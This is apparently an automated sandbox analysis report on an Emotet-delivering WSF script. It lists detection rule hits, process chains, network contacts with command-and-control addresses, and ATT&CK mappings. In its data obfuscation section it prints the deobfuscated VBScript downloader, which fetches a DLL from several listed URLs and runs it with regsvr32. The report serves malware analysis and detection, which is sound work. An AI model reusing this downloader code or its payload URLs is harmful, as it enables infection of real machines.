        Source: 00000001.00000002.1552503322.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1530447488.000002D846461000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1411114207.000002D845CCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1413926742.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1410988197.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1411114207.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1533460578.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1533460578.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1412954439.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1542433572.000002D84653C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: WEBSHELL_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: 00000001.00000003.1414114730.000002D845C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2023-01-06
        Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\BlUwZJEPejvMeG\Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180006818
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B878
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180007110
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008D28
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180014555
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00450000
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073CC14
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074A000
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074709C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00737D6C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073263C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00738BC8
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00748FC8
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00746C70
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073D474
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00732C78
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073C078
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073B07C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074B460
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00755450
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074C058
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00737840
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074C44C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00741030
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074EC30
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073B83C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0075181C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00731000
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00739408
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00737C08
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00733CF4
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007390F8
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007348FC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007420E0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00743CD4
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007314D4
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007318DC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00745CC4
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073F8C4
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007408CC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007380CC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074A8B0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007594BC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073DCB8
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007398AC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073AC94
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074CC84
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00745880
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00734C84
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00737530
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074B130
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00736138
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00741924
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00744D20
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074AD28
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00759910
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00747518
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00758500
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074610C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074D5F0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007415C8
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007395BC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074BDA0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00740A70
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00733274
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073A660
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073B258
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073F65C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074A244
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00748A2C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00740E2C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074662C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073BA2C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00734214
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073461C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00745A00
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00758A00
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074020C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00748E08
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00733E0C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007392F0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007496D4
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074EAC0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073D6CC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074A6BC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073AAB8
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00734EB8
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00733ABC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073BE90
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00744A90
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00754E8C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00738A8C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074D770
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074CF70
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00738378
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073F77C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074E750
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00734758
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073975C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073D33C
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00743B14
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074E310
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073EF14
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00744F18
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073A7F0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007527EC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00743FD0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00732FD4
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007333D4
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007497CC
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00738FB0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073FFB8
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00748BB8
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073DBA0
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00731B94
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00745384
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010AC0 ExitProcess,RtlQueueApcWow64Thread,NtTestAlert,
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010DB0 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject,
        Source: click.wsfInitial sample: Strings found which are bigger than 50
        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
        Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
        Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\rad75349.tmp.dll 2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\click.wsf"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\BlUwZJEPejvMeG\xhwdmo.dll"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\BlUwZJEPejvMeG\xhwdmo.dll"
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32
        Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\FeedbackJump to behavior
        Source: classification engineClassification label: mal100.troj.evad.winWSF@5/8@3/54
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00738BC8 Process32FirstW,CreateToolhelp32Snapshot,FindCloseChangeNotification,
        Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected

        Data Obfuscation

        barindex
        VBScript performs obfuscated calls to suspicious functions
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: wscript.scriptfullname)set request=createobject("winhttp.winhttprequest.5.1")set file=wscript.createobject("shell.application")set strout=createobject("adodb.stream")useragent="mozilla/5.0 (windows nt 6.1; wow64; rv:58.0) gecko/20100101 firefox/58.0"ouch= chr(115-1)+"e"+"gs"&"v"+chr(113+1)+"3"+"2."+chr(101)+"x"+chr(101)+" " + ""pat3= currentdir+"\"+fsobject.gettempname+".dll"loiu=ouch+ """"+ pat3 + """"set triplett=createobject("wscript.shell")url1 = "https://penshorn.org/admin/Ses8712iGR8du/"url2 = "https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/"url3 = "https://www.gomespontes.com.br/logs/pd/"url4 = "https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/"url5 = "http://ozmeydan.com/cekici/9/"url6 = "http://softwareulike.com/cWIYxWMPkK/"url7 = "http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/"docall dowloop while urlcount<8public function dow()on error resume nextselect case urlcountcase 1downstr=url1case 2downstr=url2case 3downstr=url3case 4downstr=url4case 5downstr=url5case 6downstr=url6case 7downstr=url7end selectrequest.open "get",downstr,falserequest.sendIf Err.Number<>0 thenurlcount=urlcount+1elsestrout.openstrout.type=1if vare=0 thencad=1elsefar=2end ifstrout.write (request.responsebody)if roum=0 thensio=sio+1elseend ifstrout.savetofile pat3strout.closearmour = "samcom."set fsobject=createobject("scripting.filesystemobject")Set f = fsobject.GetFile(pat3)GetFileSize = clng(f.size/1024)If GetFileSize > 150 Thencall roizeurlcount = 8elsepat3= currentdir+"\"+fsobject.gettempname+".dll"loiu=ouch+ """"+ pat3 + """"urlcount=urlcount+1end ifend ifend functionpublic function roizeif derti=0 thensem=sem+1elseend ifurlcount = 8triplett.run (loiu),0,truecor = "samo"set fsobject=createobject("scripting.filesystemobject")set textstream = fsobject.createtextfile(""+wscript.scriptfullname+"")textstream.write ("badum tss")if rotate = 12 thensable = 54 + 22elserouttt = "carry"end ifend functionIHost.ScriptFullName();IFileSystem3.GetParentFolderName("C:\Users\user\Desktop\click.wsf");IHost.CreateObject("shell.application");IFileSystem3.GetTempName();IWinHttpRequest.Open("get", "https://penshorn.org/admin/Ses8712iGR8du/", "false");IWinHttpRequest.Send();_Stream.Open();_Stream.Type("1");IWinHttpRequest.ResponseBody();_Stream.Write("Unsupported parameter type 00000000");_Stream.SaveToFile("C:\Users\user\Desktop\rad95DC4.tmp.dll");_Stream.Close();IFileSystem3.GetFile("C:\Users\user\Desktop\rad95DC4.tmp.dll");IFile.Size();IFileSystem3.GetTempName();IWinHttpRequest.Open("get", "https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/", "false");IWinHttpRequest.Send();_Stream.Open();_Stream.Type("1");IWinHttpRequest.ResponseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\Desktop\rad1F9A4.tmp.dll");_Stream.Close();IFileSystem3.GetFile("C:\Users\user\Desktop\rad1F9A4.tmp.dll");IFile.Size();IFileSystem3.GetTempName();IWinHttpRequest.Open("get", "https://www.gomespontes.com.br/logs/pd/", "false");IWinHttp
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180005C69 push rdi; ret
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800056DD push rdi; ret
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073A0FC push ebp; iretd
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_007480D7 push ebp; retf
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00736CDE push esi; iretd
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00736C9F pushad ; ret
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00739D51 push ebp; retf
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00748157 push ebp; retf
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00747D4E push ebp; iretd
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00747D3C push ebp; retf
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00747D25 push 4D8BFFFFh; retf
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073A1D2 push ebp; iretd
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00747987 push ebp; iretd
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0073A26E push ebp; ret
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00747EAF push 458BCC5Ah; retf
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00739E8B push eax; retf
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0074C731 push esi; iretd
        Source: rad75349.tmp.dll.1.drStatic PE information: section name: _RDATA
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll
        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\rad75349.tmp.dllJump to dropped file
        Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\BlUwZJEPejvMeG\xhwdmo.dll (copy)Jump to dropped file
        Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\BlUwZJEPejvMeG\xhwdmo.dll (copy)Jump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)
        Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\BlUwZJEPejvMeG\xhwdmo.dll:Zone.Identifier read attributes | delete
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exe TID: 6476Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\regsvr32.exe TID: 6560Thread sleep time: -240000s >= -30000s
        Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.5 %
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformation
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008D28 FindFirstFileExW,
        Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformation
        Source: wscript.exe, 00000001.00000003.1534710579.000002D846515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1542609320.000002D846518000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1540392196.000002D846515000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW10p9pF
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1553706057.000002D846703000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: wscript.exe, 00000001.00000003.1541349732.000002D846702000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.2367342315.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.2661608245.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.1868438531.0000000000D1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW&
        Source: regsvr32.exe, 00000004.00000003.1868438531.0000000000D1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW+
        Source: wscript.exe, 00000001.00000003.1546482854.000002D8467A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: regsvr32.exe, 00000004.00000003.1868438531.0000000000CCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000A878 GetProcessHeap,
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800082EC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800017DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Benign windows process drops PE files
        Source: C:\Windows\System32\wscript.exeFile created: rad75349.tmp.dll.1.drJump to dropped file
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 164.90.222.65 443
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 31.31.196.172 443
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 186.202.153.5 443
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 203.26.41.131 443
        Source: C:\Windows\System32\wscript.exeDomain query: penshorn.org
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 66.228.32.31 7080
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 187.63.160.88 80
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.168.155.143 8080
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 91.121.146.47 8080
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 160.16.142.56 8080
        Source: C:\Windows\System32\wscript.exeDomain query: www.gomespontes.com.br
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 182.162.143.56 443
        Source: C:\Windows\System32\wscript.exeDomain query: bbvoyage.com
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 167.172.199.165 8080
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 163.44.196.120 8080
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\Desktop\rad75349.tmp.dll
        Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800070A0 cpuid
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001D98 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

        Stealing of Sensitive Information

        barindex
        Yara detected Emotet
        Source: Yara matchFile source: 00000004.00000002.2660986060.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 3.2.regsvr32.exe.460000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.regsvr32.exe.460000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000002.1502600709.0000000000731000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.1501910088.0000000000460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts12
        Scripting        		1
        DLL Side-Loading        		111
        Process Injection        		21
        Masquerading        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		Exfiltration Over Other Network Medium11
        Encrypted Channel        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts1
        Exploitation for Client Execution        		Boot or Logon Initialization Scripts1
        DLL Side-Loading        		1
        Virtualization/Sandbox Evasion        		LSASS Memory121
        Security Software Discovery        		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
        Non-Standard Port        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)111
        Process Injection        		Security Account Manager1
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
        Ingress Tool Transfer        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)12
        Scripting        		NTDS2
        Process Discovery        		Distributed Component Object ModelInput CaptureScheduled Transfer4
        Non-Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Hidden Files and Directories        		LSA Secrets1
        Remote System Discovery        		SSHKeyloggingData Transfer Size Limits115
        Application Layer Protocol        		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common2
        Obfuscated Files or Information        		Cached Domain Credentials2
        File and Directory Discovery        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items1
        Regsvr32        		DCSync24
